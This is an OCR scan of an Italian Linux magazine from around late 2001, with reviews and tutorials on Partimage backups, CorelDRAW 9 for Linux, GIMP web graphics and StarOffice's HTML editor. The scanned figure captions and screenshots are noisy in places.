istruzioni a corredo. 
Potremo quindi riavviare la 
nostra macchina con il 
mini sistema appena 
creato e procedere al 
backup. 


Uso di 
Partition Image 


Avviando Partlmage 
vedremo comparire la 
schermata del programma: 
un'interfaccia semigrafica 
essenziale ma completa, 
come del resto anche il 
suo funzionamento. 
Muovendoci con il tasto 
Tab dovremo andare ad 
evidenziare la partizione da 
archiviare, successivamen- 
te potremo digitare il 
nome del file da creare e 
quindi procedere alla 
seconda schermata. 
Selezioneremo quindi il 
tipo di compressione da 
dare al file immagine: gzip 
o bzip2. Dalle prove 
effettuate possiamo dire a 
grandi linee che mentre 
una bzip2, più lenta, arriva 
ad un rapporto di 
compressione superiore in 
genere del 50%, la gzip 
molto più rapida rasenta 
raramente il 40%. 
Partimage consente inoltre 
la creazione di immagini 
non compresse. Le 
partizioni supportate al 
momento della stesura 
dell'articolo dalla versione 
0.60 sono le classiche ext, 


ed ext2 di Linux, le vfat di 
Windows (Fat16 e Fat32), 
le partizioni di WinNT e 
2000 dette NTFS. A queste 
si aggiungono l'HPFS 
usato dall'OS/2 di IBM, e le 
più recenti partizioni di 
tipo journaled: ext3, 
ReiserFS, JFS. 

Questi particolari tipi di 
partizione erano, fino a 
poco tempo fa, disponibili 
esclusivamente per Unix di 
tipo commerciale, rappre- 
sentano oggi la naturale 
evoluzione degli attuali 
filesystem e sono 
caratterizzati da 
un'estrema velocità nel 
ripristino del filesystem in 
seguito a crash di sistema. 
Un particolare registro, 
annota infatti le ultime 
modifiche effettuate sul 
disco e si riserva la 
trascrizione in tempi 
posteriori, (es. quando la 
cpu è meno sollecitata). 
Nel caso di riavvio di 
sistema in seguito ad un 
crash, il recover non dovrà 
preoccuparsi di esaminare 
tutta la filesystem, ma 
dovrà solamente 
aggiornare la stessa con i 
dati contenuti nello 
speciale registro. | tempi di 
recupero dei journaled 
filesystem (nell'ordine di 
pochi secondi), ne fanno 


pertanto una necessità per 
chi voglia ospitare sulle 
proprie macchine server di 
qualunque tipo. 


Conclusioni 


Il prodotto è ottimo e 
dimostra l'efficienza del 
modo di sviluppare 
software utilizzando le 
licenze di tipo GPL. 
Purtroppo per motivi di 
sviluppo le versioni stabili 
e development creano al 
momento dei file fra loro 
non compatibili, anche se 
questo problema verrà 
risolto sicuramente al 
momento del passaggio 
allo stato stabile 
dell'attuale versione di 
sviluppo. Aspettiamo 
anche i futuri sviluppi dei 
modi grafici in framebuffer 
per vedere comparire un 
sistema di backup 
semplice, flessibile (ma lo 
è già), e magari dalla veste 
grafica accattivante! 
Una menzione di lode va 
data oltremodo alla 
documentazione fornita a 
corredo: semplice ed 
esaustiva e al sito internet 
ufficiale http:/www.parti- 
mage.org altrettanto ben 
curato e gestito. 

Andrea Cavaleri 


Figura 6 


Partimage consente di creare immagini usando diversi algoritmi 


di compressione. 
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CorelDRAW: — 


un gigante fra | pinguini 


CorelDRAW rappresenta per gli addetti ai lavori un pacchetto completo ed 
economico. Nel realizzare il porting per Linux, la 9.0, la casa di Ottawa ricopre 
anche un importante ruolo di pioniere. Esaminiamone insieme le caratteristiche. 
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ell'inverno scor- 
so, Corel 
Corporation ha 
annunciato l'usci- 
ta sul mercato della prima 
versione per Linux del suo 
prodotto di punta: la suite 
grafica Corel Draw. 
Il software è direttamente 
derivato dalla versione 9.0 
per Windows, e comprende 
al suo interno CorelDRAW 9 
per la grafica vettoriale, 
l'impaginazione di piccole 
pubblicazioni e il publi- 
shing, CorelPhotoPaint per 
la grafica bitmap, alcune 
utility per l'esportazione 
delle proprie creazioni su 
web, una ricca collezione di 
font in formato True Type e 
Adobe Type 1, e varie colle- 
zioni di ClipArt, texture e 


immagini. 

AI momento non esiste una 
versione in lingua italiana 
del prodotto per Linux, 
anche in virtù del fatto che 
la suite grafica è distribuita 
solamente in Canada, USA, 
o on-line in tutto il mondo 
tramite l'efficiente sito 
http://\www.corel.com. 

Il prezzo della suite, fissato 
in 400 USD, appare al 
momento dell'acquisto un 
po' elevato se si tiene conto 
che alcune parti del softwa- 


re non sono state ricompila- 


te ma funzionano appog- 
giandosi a WINE, un emula- 
tore di Windows per Linux, 
ma ogni indugio sarà fuga- 
to al primo avvio del pro- 
gramma, in quanto la 
potenza del software ci fa 


capire quale e quanto sia 
stato il lavoro necessario a 
produrlo. 


Requisiti di 
sistema 


Corel consiglia di non utiliz- 
zare la suite grafica con 
macchine dotate di caratte- 
ristiche inferiori alle 
seguenti: 


* Processore Intel o com- 
patibile a 200MHz, 

* 64Mb RAM, 

° Monitor SVGA in cui sia 
installato un sistema 
Linux con Glibc 2 e ker- 
nel 2.2, abilitato al con- 
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Welcome to the CoreiDRAW® 8 CALL 


This setup wizard will install cor 
| COreIDRAW® 3 for LINUX 10 yo 


Click Ned" to start the installation. ù ò 

É ATTENTION: THIS ISA LICENSE, NOT A SALE. THIS 

| |PRODUCT IS PROVIDED UNDER THE FOLLOWING 

[LICENSE AGREEMENT AND ALL APPLICABLE 
ADDENDA ("LICENSE") WHICH DEFINE WHAT YOU 


CANADA. THIS LICENSE INCLUDES THE 
FOLLOWING: 


4 4 G"i90-201 000, 0, Cos oparatn t 
va 1. GENERAL LICENSE AGREEMENT 


i 
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Figura 1 


Eseguendo lo script di installazione 
vedremo comparire delle finestre che ci 


guideranno. 


trollo dei pacchetti 
* Debian o RedHat. 


Nei test effettuati abbiamo 
ottenuto risultati soddisfa- 
centi anche con macchine 
leggermente meno potenti. 
Le migliori performance 
sono arrivate utilizzando la 
seconda versione del Corel 
Linux, una distro prodotta da 
Corel di derivazione Debian 
e RedHat 6.2. La suite rico- 
nosce in fase di installazione 
la distribuzione su cui si va 
ad appoggiare e nessuna 
delle distro prima citate 
hanno creato problemi o 
conflitti. 

Utilizzando distro successive, 
come Mandrake 7.2 e 8.0, 
RedHat 7.0 e 7.1 sono emersi 
degli errori che potremmo 
definire di compatibilità. La 
suite prodotta da Corel per 
Linux non utilizza i font di 
sistema ma un proprio font 
server chiamato Fonttastic. 
AI momento del porting di 
CorelDRAW un tale approc- 
cio all'uso dei font non pote- 


Figura 2 


Se siamo abituati ad usare software GNU 
leggiamo attentamente la licenza, 


...noteremo alcune differenze. 


va che essere giustificato in 
quanto XFree 3.x.x, e Linux 
in generale, non sopportava 
esplicitamente i font True 
Type (*.ttf). 
Successivamente, distribu- 
zioni sempre più nuove 
hanno cercato di porre rime- 
dio al problema dei font TTF 
utilizzando soluzioni diverse, 
(vedi Drakfont per quanto 
riguarda MandrakeLinux, 
feature aggiuntive distribuite 
con licenza GNU o più in 
generale la nuova Xfree 
4.x.X ). Sfortunatamente le 
varie soluzioni adottate si 
trovano oggi ad andare in 
conflitto fra loro stesse non 
permettendo al software di 
casa Corel di essere esegui- 
to. Nella rete è possibile 
recuperare informazioni per 
arginare tale problema, ma 
di fatto la casa canadese non 
ha reso pubblico alcun 
upgrade, (o service pack, 
come si usa da quelle parti), 
e a quanto pare ha addirittu- 
ra rinunciato allo sviluppo di 
software Linux. 
Tragicamente il risultato di 


tanti sforzi è che né 
CorelDraw né CorelPhoto- 
Paint funzionano se utilizzia- 
mo una distro uscita nell'ulti- 
mo anno, a causa di un con- 
flitto fra I'X font server e 
Fontastic. É molto probabile 
che agendo sui file di confi- 
gurazione sia possibile riu- 
scire a far funzionare il tutto 
anche sulle nuove distribu- 
zioni. 

Sconsiglio tuttavia ai princi- 
pianti di "smanettare" su tali 
file senza aver prima effet- 


Figura 3 


Il pacchetto contiene sia CorelDRAW 9 che 
Corel PhotoPaint 9 per Linux. 


tuato un backup totale del 
sistema. 


Installazione 


L'installazione e disistallazio- 
ni sono veramente molto 
semplici: per eseguirle 
basterà inserire il cd e da 
ambiente grafico eseguire 
rispettivamente gli script 


.Jinstall © 


= ea tion x 


Mandrake 
Caldera 
TurboLinux 
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Lo script di installazione riconosce automaticamente le distro 


più famose 


sse 
CASI 
Dicembre 2001/Gennaio 2002 @@ 


./remove-graphics9 


Verrà così visualizzata una 
serie di finestre che ci guide- 
ranno durante l'installazione. 
Nelle prove effettuate sono 
emersi alcuni problemi nella 
fase di disistallazione nel 
caso in cui la nostra Linux 
box sia dotata di Glibc 2.2 0 
superiori. Il problema è forse 
dovuto ai controlli che gli 
script di installazione e disi- 
stallazione eseguono sulle 
Glibc, in quanto mentre il 
controllo in fase di installa- 
zione prevede: 


Glibe>=2.0 


In fase di disinstallazione il 
controllo viene effettuato 
con 


Glibe =2.0 or 2.1 


Comunque senza nessun 
problema potremo procede- 
re alla rimozione dei pac- 


chetti deb/rpm manualmen- 
te. 


Wine: 
facile, veloce 
ed economico 


Come abbiamo detto, buona 
parte di Corel PhotoPaint e 
una parte di CorelDraw han- 
no bisogno, per un corretto 
funzionamento, di Wine, un 
emulatore Windows per 
Linux. Corel ha provveduto a 
creare una procedura di auto 
configurazione di Wine che 
verrà eseguita ad ogni avvio 
del programma. Corel Draw 
per Linux utilizza Wine meno 
massicciamente di Corel 
PhotoPaint, questo perché il 
software di rendering vetto- 


riale è stato interamente 
ricompilato. Corel Draw 9.0, 
è stato infatti portato recen- 
temente anche su piattafor- 
me Mac, questo può aver 
indotto gli ingegneri della 
casa di Ottawa a investire 
per rendere il codice del 
motore di rendering molto 
portabile in modo da ottimiz- 
zare le performance dei pro- 
cessori G3 e G4 dotati di una 
speciale unità di calcolo per 
la grafica vettoriale a 128 bit. 
Noteremo però che alcune 
parti del software, ad esem- 
pio le librerie per l'apertura e 
il salvataggio dei file sono 
emulate. 

L'utilizzo di emulatori quali 
Wine non dovrebbe essere 
accolta con entusiasmo dagli 
utenti in quanto questi com- 
portano in generale degli 
svantaggi quali rallentamenti 
e instabilità evitabili. Tutto 
sommato Corel ha effettuato 
un ottimo porting e un'otti- 
mizzazione del software dav- 
vero eccezionale tanto da 
rendere impercettibili le dif- 
ferenze di velocità fra la ver- 
sione nativa e quella per 
Linux. D'altro canto la stabi- 
lità è stata migliorata in vari 
modi. Utilizzando pesante- 
mente il software osservia- 
mo che la stabilità è parago- 
nabile se non superiore a 
quella della versione per 
Windows; inoltre la versione 
di Wine a corredo di 
CorelDRAW dovrebbe con- 
sentire di salvare i propri 
lavori in caso di crash del 
sistema emulato. 


Fra forme... 


CorelDRAW 9.0 per Linux 
sUpporta tutti i formati sup- 
portati dalla versione 
Windows, fra i quali ricordia- 


mo: Encapsulated Postscript, 
Adobe Illustrator, Adobe 
PhotoShop, Macromedia 
FreeHand, Macromedia 
Flash, ecc... 

A questi sono stati aggiunti 
alcuni formati tipici degli 
ambienti Linux, quali *.xcf 
(GIMP) e *.xpm (X PixMap). 
Molto interessante il suppor- 
to per l'importazione e la 
creazione di file PDF, dotati 
di iper link e ottimizzati per 
la stampa, la rete, la distribu- 
zione su supporti quali cd, 
ecc. 

CorelDraw permette altresì 
di esportare i propri lavori in 
formati consoni al web quali 
file HTML e fogli di stile CSS. 


.. @ colori ! 


E se i nostri lavori sono fina- 
lizzati alla stampa? Nessun 
problema! Corel Draw con- 
sente l'utilizzo di file Profilo 
Colore, definiti dall'estensio- 
ne *.ICC dall'International 
Color Consortium, e un 
sistema di palette dei colori 
professionali come i sistemi 
HKS e Pantone, ottimizzati 
oggi anche per i sistemi ad 


esacromia. 


A corredo 


Qualora decidessimo di 
acquistare CorelDraw, nella 
confezione troveremo tre CD 
di cui gli ultimi due sono 
esclusivamente dedicati al 
contenimento di ClipArt e 
immagini, mentre i file di 
installazione della suite grafi- 
ca sono contenuti esclusiva- 
mente nel primo. Nella sca- 
tola sono inoltre contenuti 
tre importanti manuali. | 
primi due sono le guide 
utente di Corel Draw e Corel 
PhotoPaint presenti nel 
primo CD, il terzo un utile 
catalogo cartaceo delle 
ClipArt contenute nel secon- 
do CD, le texture e le imma- 
gini del terzo CD e i font pre- 
senti nel primo. Nella scatola 
è anche presente un pingui- 
no gonfiabile che regge fra 
le mani il cubo simbolo del 
Corel Linux, un fascicolo 
contente una piccola guida 
all'installazione, e la cartoli- 
na di registrazione. 
Rovistando fra le ClipArt 


@ Release Notes 


» fifj CORELCITY.COM 
» ® CorsiDRAW3 
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Corel Draw si integra nei menù di Gnome e KDE 


stream FontTastic Font Installer es 
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Baubodbi.ttf 
Baubodi.ttf 
Belweb.ttf 
Belwel.ttf 
Bengulan.ttf 
Bengulab.ttf 
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Bnhrdmon.ttf 
Bnhramob.ttf 
Bnhrambi.ttf 
Bnhrdmol.tif 
antquab.ttf 
antquabi.tif 
antqual.tif 
Brushscn tif 
Bulmern.ttf 
Bulmeri.ttf 
Calg421n.tf 
Calg421nttf 
Calg421nttf 
Calga21n.tf 
Calg421n.ttf 
Candidan.ttf 
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Fonttastic: gioia e dielbs 


noteremo che rispetto alla 


versione per Windows 


e della s suite tarata di Corel. 


apprezzato lo spirito. 
è 


stata aggiunta una sezione 
interamente dedicata al 


mondo dei pinguini. 


Certamente, la presenza di 
tali ClipArt non può giustifi- 
care l'acquisto del software, 


ma penso che ne vada 


Registered 
Cre; 


FANTONEO and ct: 
x-color Process 3: 
Kodak Digital Scienci 


Figura 7 
CorelDraw: Si parte! 


Conclusioni 


Elencare le mansioni che 
CorelDRAW riesce a coprire 
in poche righe è un impresa 


Version 9 
Copyright © 1988-2000 Corel Corporation. All rights reserved. 


to: Unknown User Serial #: Unknown 
ating Application Environment... 
pr Pantone, Inc. trademarta are the property cf Pantone, Inc. 


Jem Patent Pending » Pantone, inc. © Pantone, Inc., 1939, 1996 
e ICCAPI copyright O 1995-1997 Eastman Kodak Company. 
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Figura 8 


Realizzare esaltanti pubblicazioni con CorelDRAW è molto facile. 


Provare per credere! 


ardua. | suo compiti non si 
limitano infatti alla creazione 
di biglietti da visita, auguri e 
calendari. 

La qualità della suite grafica 
proposta da Corel è eccelsa 
e va dato il merito a Corel di 
essere stata la prima ad aver 
realizzato un porting per 
Linux di un programma di 
grafica di tali dimensioni. 
L'utilizzo di un emulatore 


può far storcere il naso ai 
puristi dell'informatica, ma 
come già detto non penaliz- 
za le performance. 
Peccato altresì che al 
momento non siano presenti 
le versioni in italiano, e 
soprattutto agevolazioni nei 
prezzi per licenze studenti 
relative all'acquisto di tale 
software. 

Andrea Cavaleri 
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Corel Draw è dotato di ottimi filtri per l'importazione e 
l'esportazione. Fra questi ottimo quello per i file PDF. 


°57 


Cromatika 


Ricerca, Download, Rete!!! 


Gli aggiornamenti, i commenti e i programmi 
per essere sempre al corrente su tutto 
quello che succede 


nel mondo del software. 


pesa NHL 2002 
ev ML 
Void Tribes 2 


GIMPA4VVEB 


Proseguendo nella propria evoluzione Gimp amplia | propri 
confini anche nel campo della grafica per il web. 

Gli strumenti che oggi fornisce sono più che sufficienti per 
creare e gestire la parte grafica delle nostre pagine web. 
Esaminiamole insieme. 


La diffusione di internet 
e della multimedialità in 
generale ha portato i 
programmi di grafica 
pittorica ad evolversi 
ulteriormente, 
affiancando agli 
strumenti necessari alla 
produzione di file 
destinati all'editoria 0 
alla stampa, altri 
destinati alla 
pubblicazione web. 


a differenza fra le due 
destinazioni consiste 
essenzialmente nel 
rapporto qualità 
dell'immagine su dimensio- 
ne in byte del file, che, inin- 
fluente nella produzione 
editoriale, (le dimensioni dei 
file realizzati hanno relativa- 
mente poca importanza, 
conta solo il risultato finale), 
deve essere molto contenu- 
to nella pubblicazione web 
in modo da agevolarne la 
diffusione sulle nostre lentis- 
sime reti. | produttori di soft- 
ware commerciali sono stati 
bravi a fare di necessità virtù 
e hanno colto questo proble- 
ma come occasione per 
creare nuovi programmi e 
quindi nuovi introiti. GIMP 
non è stato da meno e ha 
finora risposto bene alle 
crescenti nuove esigenze dei 
propri utenti. Nella versione 
1.2.1 troviamo infatti molti 
strumenti utili per la produ- 
zione di grafica destinata al 


web, e addirittura alcuni wi- 
zard per crearne in pochi 
passi. 


Grafica Web in 5 
" a 
minuti 
Gimp mette a disposizionè 
dei propri utenti alcuni script 
per la creazione in pochi se- 
condi di bottoni e frecce da 
utilizzare nelle nostre pagine 
HTML. Per fare ciò basterà 
cliccare su Xtns --> ScriptFu 
-->Bottoni o Xtns --> Script- 
Fu -->Temi pagina web. | ri- 
sultati ottenuti sono tipici 
dello stile delle pagine web 
di qualche anno fa e se non 
vogliamo che questi evolva- 
no in veri e propri obbrobri 
dovremo corredare il tutto di 
sano buon gusto. Questo 
non è però l'unico mezzo 
che Gimp ci mette a disposi- 
zione. Se dalla Toolbox di 
Gimp esaminiamo il menù 


Xnts --> ScriptFu -->Logos 
troveremo una grande quan- 
tità di script per la creazione 
di loghi, che con opportune 
modifiche potremo utilizzare 
per la creazione di un valido 
e suggestivo tema per le no- 
stre pagine. Possiamo per 
esempio creare un tema go- 
liardico destinato ad am- 
bienti vicini alla scuola utiliz- 
zando il Logos "/migre", o fi- 
ne ed elegante utilizzando il 
"Cristal", ecc... ricordando 
che in caso di necessità pos- 
siamo selezionare dei tasti di 
scelta rapida semplicemente 
posizionandoci sulla voce 
del menù interessata e digi- 
tando quindi la combinazio- 
ne di tasti voluta. 


Questioni 
di spazio 


| risultati ottenuti vanno 
adesso convertiti in un for- 
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Figura i 


Gimp consente di creare bottoni e barre per pagine web in pochi 


passi. 


mato consono alla visualiz- 
zazione web. Se l'immagine 
è di piccole dimensioni, ( es. 
pulsanti, barre e sfondi), è 
consigliabile optare verso 
formati quali l'*.png, o 
Portable Network Graphics, 
mentre se di più grandi di- 
mensioni sarà preferibile op- 


tare verso una compressione 
di tipo Jpeg. 

La differenza principale tra i 
due formati è relativo al me- 
todo di compressione. 
Mentre nei formati bitmap, 
quali il PNG, la compressio- 
ne crea l'archivio in maniera 
biunivoca, consentendo di ri- 


Gli innumerevoli script per la creazione di logos possono essere 
utilizzati per creare temi per pagine web. 


Figura 3 


La modalità di colore RGB è perfetta per il web, ma 


ingombrante. Con GIMP possiamo creare delle palette di colori 
ottimizzate per ridurre lo spazio e quindi i tempi di download. 


salire identicamente al risul- 
tato di partenza, nella com- 
pressione JPEG restituisce 
valori simili, ma non identici. 
La compressione JPEG crea 
infatti immagini molto simili 
e addirittura identiche alla vi- 
sta all'originale, consenten- 
do altresì di raggiungere rap- 
porti di compressione anche 
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Figura 4 


vicini al centinaio. 

Sul web è molto frequente 
anche il formato GIF, un per 
così dire "fratello minore, ...e 
sfortunato" del formato 
PNG, che avendo al suo in- 
terno un algoritmo di com- 
pressione, (LZW) protetto da 
copyright, non è ben visto 
dai puristi dell'Open Source. 
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ImageMap consente di selezionare delle zone rettangolari o 
ellittiche a cui associare link, comportamenti o altro. 


Figura 5 


Imagemap crea del codice HTML che possiamo visualizzare in un 
qualsiasi browser o modificare in un qualsiasi editor. 


Non si tratta comunque di 
una gran perdita, il formato 
PNG si dimostra migliore del 
GIF in tutti icampi, e non a 
caso Macromedia lo ha scel- 
to come formato predefinito 
nel suo Fireworks. Per otte- 
nere migliori risultati in ter- 
mini di dimensione finale del 
file prodotto possiamo pro- 
cedere ad un grado successi- 
vo: l'ottimizzazione delle pa- 
lette. Nel mondo reale i colo- 
ri sono pressoché infiniti, 
purtroppo non lo sono nel 
mondo dei computer, e le 
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onFocus (HTML 4.0) 
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La finestra di ImageMap per . 
l'inserimento di JavaScript. 


palette altro non sono che 
degli speciali indici che l'im- 
magine usa per descrivere i 
colori in essa contenuti. Il 
formato PNG usa come de- 
fault la palette RGB a 24 bit, 
ciò significa che ogni pixel 
occuperà in memoria 24 bit, 
cioè 3 byte, ma come già 
detto potremo cercare di ot- 
timizzare le palette ottenen- 
do risultati migliori. Se utiliz- 
ziamo immagini di dimen- 
sioni ridotte, è probabile che 
i colori in essa contenuti non 
abbraccino l'intero iride, ma 
solo un numero ridotto di 
colori. Possiamo perciò pro- 
cedere ad un'indicizzazione 
dei colori più ricorrenti, e fis- 
sato il numero massimo di 
colori da inserire nell'imma- 
gine far sì che i colori non 
compresi siano sostituiti con 
altri il più possibile simili. Se 
riusciamo per esempio ad 
ottenere risultati convincenti 
con soli 16, 64, o 256 colori, 
(immagine perciò a 4, 6, 8 
bit), otterremo immagini che 
pesano, in termini di spazio 
su disco rispettivamente 1 / 
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Figura 7 


Gimp consente di comprimere 
le immagini nel formato JPEG. 
Nella finestra delle opzioni 
potremo selezionare l'indice 
di compressione. 


6, 1/4, 1/8 del formato ori- 
ginale. Gimp provvede a 
queste operazioni in maniera 
automatica. Per procedere 
alla riduzione dei colori ba- 
sterà cliccare con il tasto de- 
stro sull'immagine aperta e 
selezionare quindi /Immagine 
--> Metodo --> Scala di 
Colore. Vedremo adesso ap- 
parire una finestra che ci 
proporrà di lavorare con pa- 
lette di lavoro già preforma- 
te, o ottimizzare il nostro la- 
voro ad una palette persona- 
lizzata. | colori ora disponibili 
sull'immagine saranno solo 
quelli sulla palette. Per vi- 
sualizzarli basterà seleziona- 
re la voce Finestre --> Palette 
in scala di colore dal menù 
di Gimp. Come già detto im- 
magini di grande dimensio- 
ne, (in termini di pixel), si 
prestano ad una più congrua 
compressione JPEG. Per rea- 
lizzarla sarà sufficiente acce- 
dere al menù File --> Salva 
con nome, per visualizzare la 
finestra delle opzioni. 


ImageMap 
e altro 


Gimp dispone, nella sezione 


Filtri del proprio menù, di 
una particolare sezione de- 
nominata Web. Si tratta di 
una sezione del programma 
in piena crescita, e che pur- 
troppo per questo risente 
ancora di qualche baco. 
Utilizzando per esempio Filtri 
--> Web --> ImageMap, po- 
tremo creare delle porzioni 
di codice in cui ad un'unica 
immagine possono essere 
associati più link, behaviors, 
ecc... Image Map può quindi 
essere inteso come un otti- 
mo preludio a quello che po- 
trebbe diventare un pezzo 
forte di Gimp. 

Peccato che allo stadio at- 
tuale richieda una buona co- 
noscenza dello javascript in 
quanto la finestra del plugin 
si limita a proporci una ca- 
sella in cui inserire porzioni 
di codice. 


Conclusioni 


Nel mondo Linux non si 
sente tanto la mancanza di 
un software per la gestione 
di immagini per il web, 
quanto di un editor HTML 
"Dreamweaver like" che 
consenta la meccanizzazio- 
ne di certe operazioni. 
Gimp comunque ci mette in 
condizione di creare tutto 
quello che concerne la par- 
te grafica delle pagine, e 
ancora una volta si confer- 
ma con eccellenza nel suo 
campo. 
Gli script messi a disposi- 
zione da GIMP per la crea- 
zione di loghi possono inol- 
tre essere esaminati, in mo- 
do da poter iterare le ope- 
razioni normalmente ese- 
guite su brevi testi anche su 
immagini. Peccato per il 
formato GIF. 

Andrea Cavaleri 
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CLICCA LA NOTIZIA 


iAttualità, politica, sport... alla ricerca dei siti giusti per essere 
iSempre informati, in pochi clic! 


4r. UNA DIETA PER | TUOI! FILE! 


iLe ‘idee ed i trucchi per comprimere tutti i tuoi documenti e perdere meno tempo. 


0K, IL PACCO È GIUSTO 


i Acquisti in Rete: le idee per evitare le truffe, trovare le occasioni d'oro e risparmiare 
itempo e denaro. 


PRIMI PASSI CON FLASH 


i Tutto il necessario per creare animazioni per il Web. 


TARIFFE FLAT 


i Esistono ancora: quale scegliere? 


‘TELEFONINI, NEXT GENERATION 


: Dal Gsm all'Umts, passando per il Gprs: come telefoneremo e navigheremo 
i tra un anno? 


VEDO TUTTO EURO! 


: Lira addio: guida agli strumenti per rendere indolore 
: Îl passaggio. 


Consumer 


Come per i più moderni 
pacchetti per ufficio, 
anche StarOffice integra 
un modulo per la 
creazione e la gestione 
di documenti HTML. In 
questo articolo sono 
mostrati i fondamenti del 
linguaggio HTML, che 
comunque sono illustrati 
solo per completezza e 
per fornire una visione 
esauriente dell'HTML 
editing. Non bisogna 
però pensare che per 
creare pagine di qualità 
bisogna comunque 
conoscere il linguaggio. 
Con StarOffice creare 
pagine HTML è facile 
cOME scrivere un 
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StarOffice 


HTML Editor 


Crea le tue pagine web con il pacchetto della SUN. 


TML è 
l'acronimo di 
hypertext 
markup 
language. Per i puristi 
della programmazione 
possiamo dire che non si 
tratta di un vero e proprio 
linguaggio, bensì di una 
serie di specifiche per 
creare documentazione 
web. Ogni pagina HTML è 
infatti un documento di 
testo (ASCII), il cui 
sorgente può essere 
aperto e modificato con 
qualsiasi editor di testo, 
dallo spartano vi fino agli 
applicativi di documenti 


qualsiasi punto di internet 
(link o hyperlink), 


collegamenti ad immagini, 


impostazioni degli sfondi, 
tabelle e così via, come 
mostrato in Figura 1. 

Per dare una breve 
descrizione sui campi più 
elementari si può vedere 
che la prima riga è un 
commento interno che 
non viene elaborato dal 
browser; tutti i commenti 
sono racchiusi tra i 


seguenti campi <! e > nel 
modo seguente: 


<! [testo inserito nel 
commento] > 
Inoltre per ogni tag 
<[tag]> che racchiude il 
testo o altri tag secondari 
annidati, c'è sempre un 
suo corrispettivo <//tag]> 
che "chiude" la sezione. 
Nella pagina mostrata in 
Figura 1 possiamo 
distinguere due sezioni 
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semplice documento. Il 
resto dell'articolo lo proprio contenuto della ia pia sone commmeavatanot4ico/8.d. (ninax)* 
pagina è racchiuso da e Canone cem eds: oro 


dimostra. campi particolari, detti I) pena para 
TAG, che ne indicano la | n nia <irosereeien "0 coloee RAGA VOTa ro PAGE 
modalità di presentazione 
da parte del browser. 
I TAG danno informazioni 
per il tipo di formato da 
assegnare al testo ivi 
contenuto, oppure 
possono contenere 
collegamenti a pagine 
locali o residenti in un 
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Figura 1 


Codice HTML di una pagina Web. 
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Vista eventi di StarOttica 
Vista compiti di Starotfice 
Testo StarOttice 

Tabolta StarOffico 


Documento interno? 
Documento internet 
Decumanto internet 
Disegno StarOffica 
Collegamento 


1028 byte 05/10/01, 164250 
01/07/01, 13.16.15 
27/05/01, 13.53.02 
27/05/01, 11.33937 
27/05/01, 112935 

1034 Byte 08/05/00. 1.20.00 

1016 Ryta 00/05/00, 120,00 

1017 0010 vasozia 2400 

094 fyte 


1010 Byte 08/05/00, 1.20.00 
1026 Byte 03/05/00, 120,00 


Figura 2 


Creazione di un docuemnto HTML. 


particolari: la "testa", 
contrassegnata dai tag 
<HEAD> </HEAD>», ed il 
"corpo" del documento fra 
tag <BODY> </BODY>: 
nella prima troviamo 
informazioni di carattere 
generale del documento, 
per esempio il titolo della 
pagina (<TITLE></TITLE>) 
e la storia del documento: 
l'autore, la creazione e 
successive modifiche. 
Bisogna osservare che 
questo documento è 
generato da un editor 
HTML, che 
automaticamente 
definisce tutte queste 
informazioni che non 
hanno importanza al fine 
della visualizzazione del 
contenuto. Esse vengono 
quindi inserite per dare 
una descrizione quanto 
più esauriente del codice 
HTML che viene letto. 
Spostandoci alla seconda 
parte troviamo il 
contenuto vero e proprio 
del documento: da notare 
che il testo (quello 
evidenziato in grigio in 
figura) è sempre 
racchiuso fra i tag di 


paragrafo <P [informazioni 
di formato]> </P>. Per 
ogni tag che apre il 
paragrafo si possono 
leggere informazioni 
sull'allinmeamento del 
testo, il font usato 
eccetera. 

Dopo questa breve 
illustrazione dell'HTML 
passiamo quindi a 
descrivere il 
funzionamento dell'editor 
HTML di StarOffice. Per 
chi fosse interessato ad 
approfondire i dettagli 
dell'HTML la 
documentazione a 
riguardo è vastissima. 


Creiamo la 
pagina HTML 


Creare un documento 
HTML è facilissimo: 
dall'Explorer di StarOffice 
è sufficiente selezionare 
nuovo documento HTML 
(Figura 2) e tutto funziona 
come un comune 
documento di testo: 
formato del testo, del 
paragrafo, uso degli stili, 
tutto è reso 


immediatamente visibile 
come verrà poi presentato 
dal browser (Figura 3). 
Ciò è possibile grazie 
all'Online Layout fornito 
da Staroffice. Ci sono co- 
munque tre altre modalità 
di visualizzazione del do- 
cumento, selezionabili dal 


menù Visualizza: Layout di 


stampa, Test Sorgente 
HTML e Schermo Intero. 
La prima opzione (Figura 
4) è utile per la stampa 
del documento e la ge- 
stione dei campi nascosti, 
come l'URL ed il titolo 
della pagina, il sorgente 
HTML è quello visualizza- 
to in Figura 1. Talvolta per 
la gestione di pagine mol- 
to ricche di dettagli è utile 
passare alla modalità sor- 
gente per la regolazione 
fine di allineamenti, di ta- 
belle e figure che non 
sempre è possibile in mo- 
dalità di Online Layout. 
Un occhio all'impostazio- 
ne della barra dei pulsanti, 
in particolare alla barra de- 
gli hyperlink (Figura 5): la 
sua attivazione consente 
di visualizzare l'URL 
corrispondente ad un 
certo hyperlink inserito 
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nel documento. L'inseri- 
mento dei link è semplice 
e immediato: è sufficiente 
accedere al menù /nseri- 
sci/Hyperlink, quindi met- 
tere le informazioni. Star- 
office suddivide i link in 
quattro sezioni: la prima è 
‘Internet’, per collega- 
menti a pagine web, FTP 
per scambio file, o 
sessioni telnet; la 
seconda 'Mail & News' 
per invio di messaggi a 
caselle di posta 0 
newsgroup, infine 
‘Documento' e ‘Nuovo 
Documento! per le pagine 
locali (Figura 6). 
specificato il tipo di link 
bisogna introdurre il testo 
con il collegamento nel 
campo Note. Il link così 
ottenuto è modificabile 
dalla barra degli strumenti 
Web (Figura 7), dove è 
possibile vedere a sinistra 
la descrizione e a destra 
l'URL di collegamento del 
testo selezionato. 

Per collegamenti internet 
di tipo web e telnet è 
sufficiente inserire l'URL 
di riferimento (Figura 6), 
mentre per i link su siti 
FTP oltre all'indirizzo 


Grazie all'online lepri è possibile vedere hu pagina HTML così 
come verrà visualizzata dal browser. 
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Figura 4 


Visualizzazione della pagina in formato di stampa. 


del documento e la chiave 
all'interno dello stesso 
(nel nostro caso la parola 
‘EDITOR’. StarOffice dà 
inoltre la possibilità di 
creare nuovi documenti a 
partire dal link (Figura 9): 
si può scegliere il tipo di 
documento, e se aprirlo in 
modifica immediatamente 


bisogna specificare i 
l'utente e la password 
con cui si fa la 
connessione, Nel caso si 
vogliano inserire indirizzi 
di posta selezionando la | 
sezione mail, basta 
scrivere l'indirizzo di posta 
elettronica del destinata- 
rio, ovvero l'indirizzo 


newsgroup. Per quanto i o dopo. 

riguarda i collegamenti a | 

documenti locali è possi- | 

bile scegliere fra docu- | Uso dei 

menti esistenti e nuovi | î : 

documenti: per quelli già | modelli e il 

esistenti (Figura 8) biso- | navigatore 
| 


